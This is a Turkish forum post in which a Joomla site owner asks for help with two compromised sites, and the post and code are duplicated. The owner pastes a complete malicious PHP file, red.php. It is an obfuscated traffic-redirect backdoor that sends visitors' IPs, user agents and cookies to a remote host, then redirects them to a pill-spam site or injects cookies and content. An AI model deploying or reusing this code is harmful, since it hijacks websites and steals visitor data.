jooma
22-04-2014, 19:08
red.php de ne? hem de her iki sitede ve anadizinlerinde.
bende de 2 adet joomla site var (3 yıllık sorunsuz), her ikisi de geçen c.tesi itibariyle eksik açılıyor. Sol sütun (left) yok orta bölüm yok ( user 4, 5 vb) Ana sayfa p.tesi hiç açılmadı, aynı hostta başka sitelere de baktım hiç açılmadı host/serveri aradım. O tarafta bir şeyler yaptı. Tamamdır falan dedi. Tekrar baktığımda diğer site tamamen açılmışken, bizim 2 site de yarım açıldı. Slider görünüyor, üstte açılır menü ve sağda reklam bannerları görünüyor, Örneğin bir haber ya da iletisim tıklayınca 404 - File or directory not found. hatası veriyor. Her iki sitede de olması ilginç. Pek çok sorun çözdüm ancak bu ilk defa oldu ve inanıyorum bu da çözülecek.
red.php notpad++ ile açtım şu çıktı? yorumu olan çözebilen varsa Allah razı olsun
Not: yahoo dan bir şeyler kurmuştum sonra kaldırdım aynı döneme denk geliyor, daha önce yandex kurmuştum ve bir yönlendirme redirek virüs siteye girmişti eval,base.64 sanırım beni çok uğraştırmıştı, 15 gün atmadığım takla kalmamıştı ancak şu index.php ye bir de bakayım dedim redirek ilk sırada ve sırıtıyordu. o kısmı sildim ve düzelmişti. Neyse uzatmadan işte red.php !
<?$tds="http://fbt.yahoo.com/counter.php";
$password="fff124106f3430";
$g="http://pillrx.ru";
$esdid="counter3";
$key="zzzzgb54y45yb45tktbwtberheh6e4wh";
?><?//BREACK//?><?php error_reporting(0);$a=str_split($password.'2','3') ;$p='0';$a[3]=str_replace('f','0',$a[3])+3;$p.=$a[4];$p.='.0';$p.=' ';$a[3]++;$p.='.0'.$a[2].'.0';$p=str_replace('f','0',$p);$t=str_replace('f ','0',$a[1]);$t=$t.';';if($_GET['mode']=='config' and $_GET['key']==$key){echo'{pkey" value="'.$key.'"}';}if($_GET["mode"]=="setconfig" AND $key==$_GET['key']){$sn=explode("/", $_SERVER['SCRIPT_NAME']);foreach($sn as $snn){$scr=$snn;}$getlpa=file($scr);$jng=$getlpa[0];$v=file($scr);for($i=0;$i<sizeof($v);$i++)if($i==0) {$ka='<?//BRE';$c=$ka.'ACK//?>';$b = explode($c, $v[$i]);$v[$i]='<? ?>'.$c.$b[1];}$d=fopen($scr,"w");fputs($d,implode("",$v));fclose($d);}$s = explode("/", $tds);$s=$s[2];$u=$s;if($p){$s=$p;}$t=substr($t, 0, strlen($t)-1);$d = fsockopen(str_replace(' ',$a[3]-strlen(' '),$s).$t, 80, $i, $o, 2);if (!$d) {$f=$g;}else{$h=urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']);$m=urlencode($_SERVER[HTTP_REFERER]);$p=urlencode($_SERVER["REMOTE_ADDR"]);$e='no';if($_SERVER["HTTP_X_FORWARDED_FOR"]){$e='yes';}$r=urlencode($_SERVER['HTTP_USER_AGENT']);foreach($_COOKIE as $key=>$n) {$t=$t."&".$key."=".$n;}$t=urlencode($t);if(empty($t)){$t=urlencode($ _SERVER['QUERY_STRING']);}$y="GET ".$tds."?dom=".$h."&ref=".$m."&ip=".$p."&prox=".$e."&agent=".$r."&cookie=".$t."&esdid=".$esdid." HTTP/1.0\r\nHost: ".$u."\r\nConnection: Close\r\n\r\n";fwrite($d, $y); while (!feof($d)) {$j=fgets($d,128);if ($j=="\r\n" && empty($q)){$q = 'do';}if ($q=='do'){$f.=$j;}}fclose ($d);$f=substr($f, 2);} $w = explode("://", $f);If($w[0]=='http'){header('HTTP/1.1 302 Found');header('Location: '.$f);} $x=substr($f,7);if($w[0]=='cook'){$k=explode("&", $x);foreach($k as $l){$z=explode("=", $l);setcookie($z[0], $z[1]);}}If($w[0]=='echo'){echo $x;}?>
bende de 2 adet joomla site var (3 yıllık sorunsuz), her ikisi de geçen c.tesi itibariyle eksik açılıyor. Sol sütun (left) yok orta bölüm yok ( user 4, 5 vb) Ana sayfa p.tesi hiç açılmadı, aynı hostta başka sitelere de baktım hiç açılmadı host/serveri aradım. O tarafta bir şeyler yaptı. Tamamdır falan dedi. Tekrar baktığımda diğer site tamamen açılmışken, bizim 2 site de yarım açıldı. Slider görünüyor, üstte açılır menü ve sağda reklam bannerları görünüyor, Örneğin bir haber ya da iletisim tıklayınca 404 - File or directory not found. hatası veriyor. Her iki sitede de olması ilginç. Pek çok sorun çözdüm ancak bu ilk defa oldu ve inanıyorum bu da çözülecek.
red.php notpad++ ile açtım şu çıktı? yorumu olan çözebilen varsa Allah razı olsun
Not: yahoo dan bir şeyler kurmuştum sonra kaldırdım aynı döneme denk geliyor, daha önce yandex kurmuştum ve bir yönlendirme redirek virüs siteye girmişti eval,base.64 sanırım beni çok uğraştırmıştı, 15 gün atmadığım takla kalmamıştı ancak şu index.php ye bir de bakayım dedim redirek ilk sırada ve sırıtıyordu. o kısmı sildim ve düzelmişti. Neyse uzatmadan işte red.php !
<?$tds="http://fbt.yahoo.com/counter.php";
$password="fff124106f3430";
$g="http://pillrx.ru";
$esdid="counter3";
$key="zzzzgb54y45yb45tktbwtberheh6e4wh";
?><?//BREACK//?><?php error_reporting(0);$a=str_split($password.'2','3') ;$p='0';$a[3]=str_replace('f','0',$a[3])+3;$p.=$a[4];$p.='.0';$p.=' ';$a[3]++;$p.='.0'.$a[2].'.0';$p=str_replace('f','0',$p);$t=str_replace('f ','0',$a[1]);$t=$t.';';if($_GET['mode']=='config' and $_GET['key']==$key){echo'{pkey" value="'.$key.'"}';}if($_GET["mode"]=="setconfig" AND $key==$_GET['key']){$sn=explode("/", $_SERVER['SCRIPT_NAME']);foreach($sn as $snn){$scr=$snn;}$getlpa=file($scr);$jng=$getlpa[0];$v=file($scr);for($i=0;$i<sizeof($v);$i++)if($i==0) {$ka='<?//BRE';$c=$ka.'ACK//?>';$b = explode($c, $v[$i]);$v[$i]='<? ?>'.$c.$b[1];}$d=fopen($scr,"w");fputs($d,implode("",$v));fclose($d);}$s = explode("/", $tds);$s=$s[2];$u=$s;if($p){$s=$p;}$t=substr($t, 0, strlen($t)-1);$d = fsockopen(str_replace(' ',$a[3]-strlen(' '),$s).$t, 80, $i, $o, 2);if (!$d) {$f=$g;}else{$h=urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']);$m=urlencode($_SERVER[HTTP_REFERER]);$p=urlencode($_SERVER["REMOTE_ADDR"]);$e='no';if($_SERVER["HTTP_X_FORWARDED_FOR"]){$e='yes';}$r=urlencode($_SERVER['HTTP_USER_AGENT']);foreach($_COOKIE as $key=>$n) {$t=$t."&".$key."=".$n;}$t=urlencode($t);if(empty($t)){$t=urlencode($ _SERVER['QUERY_STRING']);}$y="GET ".$tds."?dom=".$h."&ref=".$m."&ip=".$p."&prox=".$e."&agent=".$r."&cookie=".$t."&esdid=".$esdid." HTTP/1.0\r\nHost: ".$u."\r\nConnection: Close\r\n\r\n";fwrite($d, $y); while (!feof($d)) {$j=fgets($d,128);if ($j=="\r\n" && empty($q)){$q = 'do';}if ($q=='do'){$f.=$j;}}fclose ($d);$f=substr($f, 2);} $w = explode("://", $f);If($w[0]=='http'){header('HTTP/1.1 302 Found');header('Location: '.$f);} $x=substr($f,7);if($w[0]=='cook'){$k=explode("&", $x);foreach($k as $l){$z=explode("=", $l);setcookie($z[0], $z[1]);}}If($w[0]=='echo'){echo $x;}?>